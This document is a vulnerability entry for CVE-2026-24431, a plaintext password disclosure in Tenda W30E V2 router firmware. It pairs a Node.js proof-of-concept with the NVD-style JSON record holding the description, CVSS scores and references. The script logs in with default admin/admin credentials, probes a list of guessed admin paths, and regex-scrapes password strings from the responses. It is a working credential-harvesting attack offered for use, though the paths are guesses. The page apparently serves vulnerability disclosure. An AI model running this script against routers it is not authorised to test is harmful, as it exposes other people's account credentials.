CVE-2026-24431

// CVE-2026-24431 PoC - Tenda W30E V2 Plaintext Password Disclosure // Author: Security Researcher // Target: Tenda W30E V2 Firmware <= V16.01.0.19(5037) const axios = require('axios'); // Configuration const TARGET_IP = '192.168.0.1'; // Router IP const USERNAME = 'admin'; const PASSWORD = 'admin'; async function exploit() { console.log('[+] CVE-2026-24431 PoC - Tenda W30E V2 Password Disclosure'); console.log('[+] Target:', TARGET_IP); try { // Step 1: Login to the router management interface const loginData = new URLSearchParams(); loginData.append('username', USERNAME); loginData.append('password', PASSWORD); const loginResponse = await axios.post( `http://${TARGET_IP}/login.cgi`, loginData, { headers: { 'Content-Type': 'application/x-www-form-urlencoded' } } ); console.log('[+] Login request sent'); const cookies = loginResponse.headers['set-cookie']; // Step 2: Access the affected page to retrieve plaintext passwords // Common paths that may expose user credentials const paths = [ '/user_mgnt.cgi', '/admin/account.asp', '/cgi-bin/user_mgnt', '/cgi-bin/account_list', '/system_status.asp' ]; for (const path of paths) { try { const response = await axios.get(`http://${TARGET_IP}${path}`, { headers: { 'Cookie': cookies ? cookies.join('; ') : '' } }); // Search for password patterns in response const passwordPattern = /password['"]?\s*[:=]\s*['"]([^'"]+)['"]/gi; const matches = response.data.match(passwordPattern); if (matches && matches.length > 0) { console.log(`[+] Found plaintext passwords at ${path}:`); matches.forEach(match => console.log(' ', match)); } } catch (err) { console.log(`[-] Path ${path} not accessible`); } } console.log('[+] Scan complete'); } catch (error) { console.error('[-] Error:', error.message); } } exploit();

{"cve": {"id": "CVE-2026-24431", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.567", "lastModified": "2026-01-28T20:14:45.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) display stored user account passwords in plaintext within the administrative web interface. Any user with access to the affected management pages can directly view credentials."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta e incluyendo V16.01.0.19(5037) muestran las contraseñas de cuentas de usuario almacenadas en texto plano dentro de la interfaz web administrativa. Cualquier usuario con acceso a las páginas de administración afectadas puede ver directamente las credenciales."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-317"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-csrf-protections-for-administrative-actions", "source": "[email protected]", "tags": ["Not Applicable"]}]}}